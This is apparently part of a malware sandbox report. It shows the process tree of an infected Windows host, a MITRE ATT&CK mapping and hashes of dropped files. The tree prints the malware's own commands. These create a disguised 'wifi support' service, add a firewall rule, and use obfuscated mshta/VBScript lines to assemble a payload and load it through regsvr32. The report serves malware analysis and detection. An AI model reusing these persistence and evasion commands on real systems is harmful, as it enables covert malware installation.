                                                                                                                              "C:\Windows\System32\sc.exe" create gkooqlvy binPath= "C:\Windows\SysWOW64\gkooqlvy\upeotyqo.exe /d\"C:\Users\Admin\AppData\Local\Temp\C5A4.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                              2⤵
                                                                                                                                PID:2132
                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                "C:\Windows\System32\sc.exe" description gkooqlvy "wifi internet conection"
                                                                                                                                2⤵
                                                                                                                                  PID:3004
                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                  "C:\Windows\System32\sc.exe" start gkooqlvy
                                                                                                                                  2⤵
                                                                                                                                    PID:2540
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                    2⤵
                                                                                                                                      PID:592
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CF84.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\CF84.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:1064
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E3FF.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E3FF.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:2308
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 868
                                                                                                                                          2⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:1424
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E5F3.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E5F3.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:2720
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E72C.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E72C.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:1340
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:2992
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E855.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E855.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:2192
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2136
                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2064
                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2788
                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2908
                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1312
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2040
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:892
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2620
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2268
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1244
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\E4DD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2180
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E4DD.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\E4DD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2928
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F2E2.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F2E2.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2692
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wahlnqgs.exe" C:\Windows\SysWOW64\gkooqlvy\
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1780
                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                              "C:\Windows\System32\sc.exe" config gkooqlvy binPath= "C:\Windows\SysWOW64\gkooqlvy\wahlnqgs.exe /d\"C:\Users\Admin\AppData\Local\Temp\F2E2.exe\""
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1304
                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                "C:\Windows\System32\sc.exe" start gkooqlvy
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1056
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\6335.bat" "
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2544
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FC36.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\FC36.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:2880
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 892
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:2856
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E02.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E02.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1048
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBSCRipT: cLoSe ( CREATeObJECT ( "WsCrIPt.SHEll" ).RUN ( "C:\Windows\system32\cmd.exe /c Type ""C:\Users\Admin\AppData\Local\Temp\E02.exe"" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\E02.exe"" ) do taskkill -iM ""%~Nxg"" -F " , 0 , trUE) )
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:548
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c Type "C:\Users\Admin\AppData\Local\Temp\E02.exe" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\E02.exe" ) do taskkill -iM "%~Nxg" -F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2224
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill -iM "E02.exe" -F
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:2916
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE
                                                                                                                                                                                                UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1340
                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCRipT: cLoSe ( CREATeObJECT ( "WsCrIPt.SHEll" ).RUN ( "C:\Windows\system32\cmd.exe /c Type ""C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE"" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If ""/pcakg5O7tt4niFXuNUgbc95f "" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE"" ) do taskkill -iM ""%~Nxg"" -F " , 0 , trUE) )
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1956
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c Type "C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE" > UfB0QT.EXE && StarT UfB0Qt.eXE /pcakg5O7tt4niFXuNUgbc95f & If "/pcakg5O7tt4niFXuNUgbc95f " == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\UfB0QT.EXE" ) do taskkill -iM "%~Nxg" -F
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:2208
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCRIPT:clOSE( cREaTeobjECt ( "wScRIpT.SHeLl" ). rUN ( "CmD.ExE /q /C ECho Zb%TIME%> 657AxI.I & ecHO | SeT /p = ""MZ"" >O_N0F.hv & cOpy /y /B O_N0F.HV+ eSMMZu4.s + TWR2TUV.M + Hc6~R.I + 657AxI.i BKO6TEE.qur & stArT regsvr32.exe /U -s BKO6TEe.qur " , 0, tRUE ) )
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2664
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /C ECho Zb%TIME%> 657AxI.I & ecHO | SeT /p = "MZ" >O_N0F.hv & cOpy /y /B O_N0F.HV+ eSMMZu4.s + TWR2TUV.M + Hc6~R.I + 657AxI.i BKO6TEE.qur & stArT regsvr32.exe /U -s BKO6TEe.qur
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:2288
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>O_N0F.hv"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:1824
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:2948
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    regsvr32.exe /U -s BKO6TEe.qur
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:1112

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        New Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1050

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        New Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1050

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1222

                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1130

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        3
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1120

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\libcurl.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\libcurlpp.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\libgcc_s_dw2-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\libstdc++-6.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\libwinpthread-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_4.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_4.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\libcurl.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

